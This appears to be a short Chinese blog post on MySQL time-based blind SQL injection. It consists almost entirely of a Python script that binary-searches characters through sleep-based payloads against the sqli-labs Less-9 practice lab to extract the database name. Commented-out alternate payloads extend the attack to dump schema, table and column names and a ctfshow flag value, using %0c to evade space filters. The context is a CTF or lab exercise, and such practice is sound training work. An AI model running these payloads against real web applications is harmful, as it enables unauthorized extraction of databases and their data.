mysql基于时间的盲注
使用python代码进行爆破库名
import requests
import time
s = requests.session() # 创建session对象后,才可以调用对应的方法发送请求。
url = 'http://192.168.2.101/sqli-labs-master/Less-9/?id='
flag = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
# 查询数据库:
payload = f'1\'%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(5))--+'
# 查询数据库:payload = f'1\'%0cand%0cif((ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid}),1,sleep(3))--+'
# 查询数据表:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctfshow\')),{i},1))>{mid},1,sleep(3))--+'
# 查询表字段:payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flagug")),{i},1))>{mid},1,sleep(3))--+'
# 查询字段中信息:payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'
#payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'
stime = time.time()
url1 = url + payload
r = s.get(url=url1)
r.encoding = "utf-8"
# print(payload)
if time.time() - stime < 3:
low = mid + 1
else:
high = mid
if low != 32:
flag += chr(low)
else:
break
print(flag)
标签:--+,python,mid,substr,0cif,库名,mysql,ascii,payload From: https://www.cnblogs.com/yeziwinone/p/18111339